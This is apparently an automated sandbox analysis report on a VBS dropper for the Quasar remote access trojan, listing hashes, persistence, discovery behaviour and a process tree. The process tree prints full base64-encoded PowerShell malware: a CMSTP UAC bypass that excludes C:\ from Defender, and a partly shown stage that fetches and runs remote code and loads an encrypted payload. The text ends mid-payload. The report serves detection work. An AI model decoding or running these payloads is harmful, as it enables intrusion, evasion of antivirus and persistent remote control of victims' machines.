quasar | 0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7

Analysis

max time kernel
114s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20250129-en
resource tags

arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system
submitted
30/01/2025, 08:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tt.vbs
Size

274KB
MD5

1c83c6f80fcddabd1336cc30aa68d08f
SHA1

bb9c75690963d7c2bb608d5fb3b9b627b1bc4e34
SHA256

0dcdaedf2f76dbc431635dbc53c893692cb644f5dbdfde46bc942b9806b8f0d7
SHA512

832d55005c9192456337f840d409d79c6786fd8d2c97bb33ed04193903564ae3b4d31da0842cc522add532e4fb5b86a231890be90a4e0471b28276f57345d44a
SSDEEP

6144:eUQydS/Z5QL2AEhyNqfrASLddf9USsPgd5QxwNsCQOod2zf:UyduQLnEh4qjASj9USsIP0wNPQ2zf

Score

10^/10

quasar discovery execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/464-100-0x0000000008800000-0x000000000885E000-memory.dmp	family_quasar

Blocklisted process makes network request 3 IoCs

flow	pid	Process
14	464	powershell.exe
17	464	powershell.exe
20	464	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1532	powershell.exe
4564	powershell.exe
464	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-805940606-1861219160-370298170-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate_726 = "wscript.exe \"C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate_726.vbs\""	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
4212	taskkill.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1532	powershell.exe
1532	powershell.exe
4564	powershell.exe
4564	powershell.exe
464	powershell.exe
464	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	4564	powershell.exe
Token: SeDebugPrivilege	4212	taskkill.exe
Token: SeDebugPrivilege	464	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
464	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 3228 wrote to memory of 2124	3228	WScript.exe	83
PID 3228 wrote to memory of 2124	3228	WScript.exe	83
PID 2124 wrote to memory of 3476	2124	cmd.exe	86
PID 2124 wrote to memory of 3476	2124	cmd.exe	86
PID 3476 wrote to memory of 1532	3476	cmd.exe	88
PID 3476 wrote to memory of 1532	3476	cmd.exe	88
PID 1532 wrote to memory of 2192	1532	powershell.exe	92
PID 1532 wrote to memory of 2192	1532	powershell.exe	92
PID 2192 wrote to memory of 4276	2192	csc.exe	93
PID 2192 wrote to memory of 4276	2192	csc.exe	93
PID 1532 wrote to memory of 2336	1532	powershell.exe	94
PID 1532 wrote to memory of 2336	1532	powershell.exe	94
PID 3476 wrote to memory of 464	3476	cmd.exe	100
PID 3476 wrote to memory of 464	3476	cmd.exe	100
PID 3476 wrote to memory of 464	3476	cmd.exe	100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tt.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3476
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gcmFuZG9tWFlaLUludm9rZS1VQUMgewoKCnBhcmFtKAogICAgW1BhcmFtZXRlcihNYW5kYXRvcnkgPSAkdHJ1ZSldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpFeGVjdXRhYmxlLAogCiAgICBbUGFyYW1ldGVyKCldCiAgICBbc3RyaW5nXSRyYW5kb21YWVpDb21tYW5kCikKCiRyYW5kb21YWVpJbmZEYXRhID0gQCcKW3ZlcnNpb25dClNpZ25hdHVyZT0kY2hpY2FnbyQKQWR2YW5jZWRJTkY9Mi41CgpbRGVmYXVsdEluc3RhbGxdCkN1c3RvbURlc3RpbmF0aW9uPXJhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnMKUnVuUHJlU2V0dXBDb21tYW5kcz1yYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb24KCltyYW5kb21YWVotUnVuUHJlU2V0dXBDb21tYW5kc1NlY3Rpb25dCkxJTkUKdGFza2tpbGwgL0lNIGNtc3RwLmV4ZSAvRgoKW3JhbmRvbVhZWi1DdXN0SW5zdERlc3RTZWN0aW9uQWxsVXNlcnNdCjQ5MDAwLDQ5MDAxPXJhbmRvbVhZWi1BbGxVU2VyX0xESURTZWN0aW9uLCA3CgpbcmFuZG9tWFlaLUFsbFVTZXJfTERJRFNlY3Rpb25dCiJIS0xNIiwgIlNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXEFwcCBQYXRoc1xDTU1HUjMyLkVYRSIsICJQcm9maWxlSW5zdGFsbFBhdGgiLCAiJVVuZXhwZWN0ZWRFcnJvciUiLCAiIgoKW1N0cmluZ3NdClNlcnZpY2VOYW1lPSJyYW5kb21YWVpWUE4iClNob3J0U3ZjTmFtZT0icmFuZG9tWFlaVlBOIgonQAoKJHJhbmRvbVhZWkNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5UaHJlYWRpbmc7CnVzaW5nIFN5c3RlbS5UZXh0Owp1c2luZyBTeXN0ZW0uSU87CnVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsKdXNpbmcgU3lzdGVtLkNvbXBvbmVudE1vZGVsOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpwdWJsaWMgY2xhc3MgcmFuZG9tWFlaQ01TVFBCeXBhc3MKewogICAgW0RsbEltcG9ydCgiU2hlbGwzMi5kbGwiLCBDaGFyU2V0ID0gQ2hhclNldC5BdXRvLCBTZXRMYXN0RXJyb3IgPSB0cnVlKV0KICAgIHN0YXRpYyBleHRlcm4gSW50UHRyIFNoZWxsRXhlY3V0ZShJbnRQdHIgaHduZCwgc3RyaW5nIGxwT3BlcmF0aW9uLCBzdHJpbmcgbHBGaWxlLCBzdHJpbmcgbHBQYXJhbWV0ZXJzLCBzdHJpbmcgbHBEaXJlY3RvcnksIGludCBuU2hvd0NtZCk7CgogICAgW0RsbEltcG9ydCgidXNlcjMyLmRsbCIpXQogICAgc3RhdGljIGV4dGVybiBJbnRQdHIgRmluZFdpbmRvdyhzdHJpbmcgbHBDbGFzc05hbWUsIHN0cmluZyBscFdpbmRvd05hbWUpOwoKICAgIFtEbGxJbXBvcnQoInVzZXIzMi5kbGwiKV0KICAgIHN0YXRpYyBleHRlcm4gYm9vbCBQb3N0TWVzc2FnZShJbnRQdHIgaFduZCwgdWludCBNc2csIGludCB3UGFyYW0sIGludCBsUGFyYW0pOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIEJpbmFyeVBhdGggPSAiYzpcXHdpbmRvd3NcXHN5c3RlbTMyXFxjbXN0cC5leGUiOwoKICAgIHB1YmxpYyBzdGF0aWMgc3RyaW5nIFNldEluZkZpbGUoc3RyaW5nIENvbW1hbmRUb0V4ZWN1dGUsIHN0cmluZyBJbmZEYXRhKQogICAgewogICAgICAgIFN0cmluZ0J1aWxkZXIgT3V0cHV0RmlsZSA9IG5ldyBTdHJpbmdCdWlsZGVyKCk7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIkM6XFx3aW5kb3dzXFx0ZW1wIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoIlxcIik7CiAgICAgICAgT3V0cHV0RmlsZS5BcHBlbmQoUGF0aC5HZXRSYW5kb21GaWxlTmFtZSgpLlNwbGl0KENvbnZlcnQuVG9DaGFyKCIuIikpWzBdKTsKICAgICAgICBPdXRwdXRGaWxlLkFwcGVuZCgiLmluZiIpOwogICAgICAgIFN0cmluZ0J1aWxkZXIgbmV3SW5mRGF0YSA9IG5ldyBTdHJpbmdCdWlsZGVyKEluZkRhdGEpOwogICAgICAgIG5ld0luZkRhdGEuUmVwbGFjZSgiTElORSIsIENvbW1hbmRUb0V4ZWN1dGUpOwogICAgICAgIEZpbGUuV3JpdGVBbGxUZXh0KE91dHB1dEZpbGUuVG9TdHJpbmcoKSwgbmV3SW5mRGF0YS5Ub1N0cmluZygpKTsKICAgICAgICByZXR1cm4gT3V0cHV0RmlsZS5Ub1N0cmluZygpOwogICAgfQoKICAgIHB1YmxpYyBzdGF0aWMgYm9vbCByYW5kb21YWVpFeGVjdXRlKHN0cmluZyBDb21tYW5kVG9FeGVjdXRlLCBzdHJpbmcgSW5mRGF0YSkKICAgIHsKICAgICAgICBjb25zdCBpbnQgV01fU1lTS0VZRE9XTiA9IDB4MDEwMDsKICAgICAgICBjb25zdCBpbnQgVktfUkVUVVJOID0gMHgwRDsKCiAgICAgICAgU3RyaW5nQnVpbGRlciBJbmZGaWxlID0gbmV3IFN0cmluZ0J1aWxkZXIoKTsKICAgICAgICBJbmZGaWxlLkFwcGVuZChTZXRJbmZGaWxlKENvbW1hbmRUb0V4ZWN1dGUsIEluZkRhdGEpKTsKCiAgICAgICAgUHJvY2Vzc1N0YXJ0SW5mbyBzdGFydEluZm8gPSBuZXcgUHJvY2Vzc1N0YXJ0SW5mbyhCaW5hcnlQYXRoKTsKICAgICAgICBzdGFydEluZm8uQXJndW1lbnRzID0gIi9hdSAiICsgSW5mRmlsZS5Ub1N0cmluZygpOwogICAgICAgIHN0YXJ0SW5mby5XaW5kb3dTdHlsZSA9IFByb2Nlc3NXaW5kb3dTdHlsZS5IaWRkZW47ICAvLyBIaWRkZW4gd2luZG93CiAgICAgICAgSW50UHRyIGRwdHIgPSBNYXJzaGFsLkFsbG9jSEdsb2JhbCgxKTsKICAgICAgICBTaGVsbEV4ZWN1dGUoZHB0ciwgIiIsIEJpbmFyeVBhdGgsIHN0YXJ0SW5mby5Bcmd1bWVudHMsICIiLCAwKTsKCiAgICAgICAgVGhyZWFkLlNsZWVwKDMwMDApOwogICAgICAgIEludFB0ciBXaW5kb3dUb0ZpbmQgPSBGaW5kV2luZG93KG51bGwsICJyYW5kb21YWVpWUE4iKTsKCiAgICAgICAgUG9zdE1lc3NhZ2UoV2luZG93VG9GaW5kLCBXTV9TWVNLRVlET1dOLCBWS19SRVRVUk4sIDApOwogICAgICAgIFRocmVhZC5TbGVlcCg1MDAwKTsKICAgICAgICBGaWxlLkRlbGV0ZShJbmZGaWxlLlRvU3RyaW5nKCkpOwogICAgICAgIHJldHVybiB0cnVlOwogICAgfQp9CiJACgokcmFuZG9tWFlaQ29uc2VudFByb21wdCA9IChHZXQtSXRlbVByb3BlcnR5IEhLTE06XFNPRlRXQVJFXE1pY3Jvc29mdFxXaW5kb3dzXEN1cnJlbnRWZXJzaW9uXFBvbGljaWVzXFN5c3RlbSkuQ29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4KJHJhbmRvbVhZWlNlY3VyZURlc2t0b3BQcm9tcHQgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSBIS0xNOlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxQb2xpY2llc1xTeXN0ZW0pLlByb21wdE9uU2VjdXJlRGVza3RvcAppZiAoJHJhbmRvbVhZWkNvbnNlbnRQcm9tcHQgLUVxIDIgLWFuZCAkcmFuZG9tWFlaU2VjdXJlRGVza3RvcFByb21wdCAtRXEgMSkgewogICAgcmV0dXJuCn0KCnRyeSB7CiAgICAkcmFuZG9tWFlaVXNlciA9IFtTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eV06OkdldEN1cnJlbnQoKS5OYW1lCiAgICAkcmFuZG9tWFlaQWRtID0gR2V0LUxvY2FsR3JvdXBNZW1iZXIgLVNJRCBTLTEtNS0zMi01NDQgfCBXaGVyZS1PYmplY3QgeyAkXy5OYW1lIC1lcSAkcmFuZG9tWFlaVXNlciB9Cn0gY2F0Y2ggewogICAgJHJhbmRvbVhZWlVzZXIgPSBbU3lzdGVtLlNlY3VyaXR5LlByaW5jaXBhbC5XaW5kb3dzSWRlbnRpdHldOjpHZXRDdXJyZW50KCkuTmFtZQogICAgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgPSAnUy0xLTUtMzItNTQ0JwogICAgJHJhbmRvbVhZWkFkbWluR3JvdXAgPSBHZXQtV21pT2JqZWN0IC1DbGFzcyBXaW4zMl9Hcm91cCB8IFdoZXJlLU9iamVjdCB7ICRfLlNJRCAtZXEgJHJhbmRvbVhZWkFkbWluR3JvdXBTSUQgfQogICAgJHJhbmRvbVhZWk1lbWJlcnMgPSAkcmFuZG9tWFlaQWRtaW5Hcm91cC5HZXRSZWxhdGVkKCJXaW4zMl9Vc2VyQWNjb3VudCIpCiAgICAkcmFuZG9tWFlaTWVtYmVycyB8IEZvckVhY2gtT2JqZWN0IHsgaWYgKCRfLkNhcHRpb24gLWVxICRyYW5kb21YWVpVc2VyKSB7ICRyYW5kb21YWVpBZG0gPSAkdHJ1ZSB9IH0KfQoKaWYgKCEkcmFuZG9tWFlaQWRtKSB7CiAgICByZXR1cm4KfQoKdHJ5IHsKICAgIGlmICghW1N5c3RlbS5JTy5GaWxlXTo6RXhpc3RzKCRyYW5kb21YWVpFeGVjdXRhYmxlKSkgewogICAgICAgICRyYW5kb21YWVpFeCA9IChHZXQtQ29tbWFuZCAkcmFuZG9tWFlaRXhlY3V0YWJsZSkKICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXguU291cmNlKSkgewogICAgICAgICAgICAkcmFuZG9tWFlaRXhlY3V0YWJsZSA9ICRFeGVjdXRpb25Db250ZXh0LlNlc3Npb25TdGF0ZS5QYXRoLkdldFVucmVzb2x2ZWRQcm92aWRlclBhdGhGcm9tUFNQYXRoKCRyYW5kb21YWVpFeGVjdXRhYmxlKQogICAgICAgICAgICBpZiAoIVtTeXN0ZW0uSU8uRmlsZV06OkV4aXN0cygkcmFuZG9tWFlaRXhlY3V0YWJsZSkpIHsKICAgICAgICAgICAgICAgIHJldHVybgogICAgICAgICAgICB9CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJHJhbmRvbVhZWkV4ZWN1dGFibGUgPSAoR2V0LUNvbW1hbmQgJHJhbmRvbVhZWkV4ZWN1dGFibGUpLk5hbWUKICAgICAgICB9CiAgICB9Cn0gY2F0Y2ggewogICAgcmV0dXJuCn0KCmlmICgkcmFuZG9tWFlaRXhlY3V0YWJsZS5Db250YWlucygicG93ZXJzaGVsbCIpKSB7CiAgICBpZiAoJHJhbmRvbVhZWkNvbW1hbmQgLW5lICIiKSB7CiAgICAgICAgJHJhbmRvbVhZWkZpbmFsID0gInBvd2Vyc2hlbGwgLVdpbmRvd1N0eWxlIEhpZGRlbiAtYyAiIiRyYW5kb21YWVpDb21tYW5kIiIiCiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlaWYgKCRyYW5kb21YWVpFeGVjdXRhYmxlLkNvbnRhaW5zKCJjbWQiKSkgewogICAgaWYgKCRyYW5kb21YWVpDb21tYW5kIC1uZSAiIikgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICJjbWQgL2MgIiIkcmFuZG9tWFlaQ29tbWFuZCIiIiAgIyBDaGFuZ2VkIHRvIC9jIHRvIGNsb3NlIHRoZSBjbWQgd2luZG93CiAgICB9IGVsc2UgewogICAgICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKICAgIH0KfSBlbHNlIHsKICAgICRyYW5kb21YWVpGaW5hbCA9ICIkcmFuZG9tWFlaRXhlY3V0YWJsZSAkcmFuZG9tWFlaQ29tbWFuZCIKfQoKZnVuY3Rpb24gcmFuZG9tWFlaRXhlY3V0ZSB7CiAgICB0cnkgewogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9IGNhdGNoIHsKICAgICAgICBBZGQtVHlwZSAkcmFuZG9tWFlaQ29kZQogICAgICAgICRyYW5kb21YWVpSZXN1bHQgPSBbcmFuZG9tWFlaQ01TVFBCeXBhc3NdOjpyYW5kb21YWVpFeGVjdXRlKCRyYW5kb21YWVpGaW5hbCwgJHJhbmRvbVhZWkluZkRhdGEpCiAgICB9CgogICAgaWYgKCRyYW5kb21YWVpSZXN1bHQpIHsKICAgICAgICByZXR1cm4KICAgIH0gZWxzZSB7CiAgICAgICAgcmV0dXJuCiAgICB9Cn0KCiRyYW5kb21YWVpQcm9jZXNzID0gKChHZXQtV21pT2JqZWN0IC1DbGFzcyB3aW4zMl9wcm9jZXNzKS5uYW1lIHwgU2VsZWN0LVN0cmluZyAiY21zdHAiIHwgU2VsZWN0LU9iamVjdCAqIC1GaXJzdCAxKS5QYXR0ZXJuCmlmICgkcmFuZG9tWFlaUHJvY2VzcyAtZXEgImNtc3RwIikgewogICAgdHJ5IHsKICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgImNtc3RwIiAtRm9yY2UKICAgICAgICByYW5kb21YWVpFeGVjdXRlCiAgICB9IGNhdGNoIHsKICAgICAgICByZXR1cm4KICAgIH0KfSBlbHNlIHsKICAgIHJhbmRvbVhZWkV4ZWN1dGUKfQp9CgojIEZ1bmN0aW9uIENhbGwKcmFuZG9tWFlaLUludm9rZS1VQUMgLXJhbmRvbVhZWkV4ZWN1dGFibGUgInBvd2Vyc2hlbGwiIC1yYW5kb21YWVpDb21tYW5kICIuKCdBZGQtTXBQJyArICdyZWZlcmVuY2UnKSAtRXhjbHVzaW9uUGF0aCBDOlwgLUV4Y2x1c2lvblByb2Nlc3MgcG93ZXJzaGVsbC5leGUi')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1532
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xnflfy0t\xnflfy0t.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2192
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9635.tmp" "c:\Users\Admin\AppData\Local\Temp\xnflfy0t\CSCDFED3A772E394210AA58B5AA5AB2C29A.TMP"
        6⤵
        
        PID:4276
    - - C:\windows\system32\cmstp.exe
        
        "C:\windows\system32\cmstp.exe" /au C:\windows\temp\vwalkctu.inf
        5⤵
        
        PID:2336
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24gdW5xbXFibGJqbnBiempnKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnakZzSUxYMnhsKzBOYVJ0eGVzZ3Z2NURCdmpybmM5TmVIdVlHWFdzL09oQT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3E5aElSZmtwSTU4NHJqSi9CdGpwK3c9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaGl6bGF6ZmNwb2Rramx2KCRwYXJhbV92YXIpewlJRVggJyRkaWJzdmh1d2xwYW93Y3J2dmVueWZwdXJkPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHBsYXhucWJwbmpnemdvem1sb3dhbGl6eXQ9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRoZ3ducW5va3Bmd3V6eHl5emp0a3ZwcW9tPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGRpYnN2aHV3bHBhb3djcnZ2ZW55ZnB1cmQsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGhnd25xbm9rcGZ3dXp4eXl6anRrdnBxb20uQ29weVRvKCRwbGF4bnFicG5qZ3pnb3ptbG93YWxpenl0KTsJJGhnd25xbm9rcGZ3dXp4eXl6anRrdnBxb20uRGlzcG9zZSgpOwkkZGlic3ZodXdscGFvd2NydnZlbnlmcHVyZC5EaXNwb3NlKCk7CSRwbGF4bnFicG5qZ3pnb3ptbG93YWxpenl0LkRpc3Bvc2UoKTsJJHBsYXhucWJwbmpnemdvem1sb3dhbGl6eXQuVG9BcnJheSgpO31mdW5jdGlvbiB0cHV3cHVramJxbHBncGd3dW50Zm5wZ3NkKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckdGJ5cXJnbGJlZmtmYnh2c29xaWRybXF5Ym16Zm94c3FpYnhtcHR4ej1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGt0dXNvdHhseXJneWhrdWdrYW9maGZuZ251d2FhaWN2c2lzeXN5amlvbmh3cXRpeGdxPSR0YnlxcmdsYmVma2ZieHZzb3FpZHJtcXlibXpmb3hzcWlieG1wdHh6LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGt0dXNvdHhseXJneWhrdWdrYW9maGZuZ251d2FhaWN2c2lzeXN5amlvbmh3cXRpeGdxLkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kamJqY2xwaXZqamh0YW5xY3lybnV0Y3RzeiA9ICRlbnY6VVNFUk5BTUU7JGlpdHJvZWdndXpoeHN5cHJyd29wdHNkZ3cgPSAnQzpcVXNlcnNcJyArICRqYmpjbHBpdmpqaHRhbnFjeXJudXRjdHN6ICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkaWl0cm9lZ2d1emh4c3lwcnJ3b3B0c2RndzskdXVwZmc9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRpaXRyb2VnZ3V6aHhzeXBycndvcHRzZGd3KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgka3FhIGluICR1dXBmZykgewlpZiAoJGtxYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkcWZtdXQ9JGtxYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZHVrdmJwenFzbXhrb2plbmx5b29reXlwdz1bc3RyaW5nW11dJHFmbXV0LlNwbGl0KCdcJyk7SUVYICckYXhocHBhaXl3bXNwbnV4ZnJpZXNnZm15bz1oaXpsYXpmY3BvZGtqbHYgKHVucW1xYmxiam5wYnpqZyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRkdWt2YnB6cXNteGtvamVubHlvb2t5eXB3WzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHpvc3NnZnZ2emFzcmJjbXBsc3dseHlkcmo9aGl6bGF6ZmNwb2Rramx2ICh1bnFtcWJsYmpucGJ6amcgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZHVrdmJwenFzbXhrb2plbmx5b29reXlwd1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt0cHV3cHVramJxbHBncGd3dW50Zm5wZ3NkICRheGhwcGFpeXdtc3BudXhmcmllc2dmbXlvICRudWxsO3RwdXdwdWtqYnFscGdwZ3d1bnRmbnBnc2QgJHpvc3NnZnZ2emFzcmJjbXBsc3dseHlkcmogKCxb